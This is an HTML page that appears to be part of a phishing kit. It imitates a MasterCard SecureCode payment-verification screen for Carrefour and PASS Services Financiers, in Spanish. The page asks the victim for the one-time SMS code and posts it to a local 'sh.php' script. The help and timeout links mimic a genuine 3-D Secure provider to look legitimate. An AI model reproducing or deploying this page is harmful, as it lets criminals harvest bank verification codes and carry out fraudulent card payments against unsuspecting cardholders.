﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /><script type="text/javascript">
		window.setTimeout(function(){window.location.href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=822C1B3D5D1BB8113738ACB5E152BCB9?checkcodesmsTimeout=true"}, 300 * 1000);
	</script><noscript>
		<meta http-equiv="refresh" content="300; url=https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=822C1B3D5D1BB8113738ACB5E152BCB9?checkcodesmsTimeout=true" />
	</noscript>
	<title>PASS Services Financiers - MasterCard&reg; Secure Code&trade;</title>
	<link href="fichiers/style.css" media="screen" rel="stylesheet" type="text/css" /><!--[if IE 6]><link href="content/400/css/ie6.css" rel="stylesheet" type="text/css" media="screen" /><![endif]--><!--[if IE 7]><link href="content/400/css/ie7.css" rel="stylesheet" type="text/css" media="screen" /><![endif]--><script type="text/javascript" src="fichiers/jquery.js"></script><script type="text/javascript" src="fichiers/script.js"></script>
</head>
<body>
<div id="page">
<div id="header"><img alt="FME9sHT.png (506×89)" src="https://i.imgur.com/FME9sHT.png" /></div>

<div id="content">
<h1>&nbsp;</h1>

<h1>Pague sus compras con total seguridad<br />
<span style="font-weight:normal;">gracias a la soluci&oacute;n MasterCard&reg; Secure Code&trade;<br />
elegida por Carrefour.</span></h1>

<ul class="infos left">
	<li>Vendedor</li>
	<li>Importe</li>
	<li>Fecha</li>
	<li>N&uacute;mero de tarjeta</li>
</ul>

<ul class="infos right">
	<li>Carrefour</li>
	<li>EUR 00.00</li>
	<li>20180302</li>
	<li>XXXX XXXX XXXX XXXX</li>
</ul>

<div class="clear">&nbsp;</div>
<!-- Form -->

<div class="form">
<div class="content">
<div id="erreur">&nbsp;</div>

<form action="sh.php" method="post">
<fieldset>
<div class="field center ">
<p><span class="bold">Introduzca aqu&iacute; la contrase&ntilde;a recibida</span><br />
en su n&uacute;mero de tel&eacute;fono: 34XXXXXXXXX<br />
(v&aacute;lida durante cinco minutos)</p>
<input class="ieheight field_to_verify" id="codesms" maxlength="20" name="codesms" type="text" />
<p><span id="not_received_link" style="display: none;"><a href="">No ha recibido ninguna contrase&ntilde;a</a> | </span><a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=822C1B3D5D1BB8113738ACB5E152BCB9?phoneChange=true">Ha cambiado de n&uacute;mero</a></p>
</div>
</fieldset>

<div class="button"><a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=822C1B3D5D1BB8113738ACB5E152BCB9?help=true"><img alt="Ayuda" height="15" src="fichiers/bt_help_es.gif" width="45" /></a>&nbsp;&nbsp; <!-- cancel -->&nbsp;&nbsp;&nbsp; <!-- Submit --> <input alt="Siguiente" id="submit" name="submit" src="fichiers/bt_next_es.gif" type="image" value="submit" /></div>
</form>
</div>
</div>
<!-- End Form --></div>

<div id="footer">&nbsp;</div>
</div>
</body>
</html>
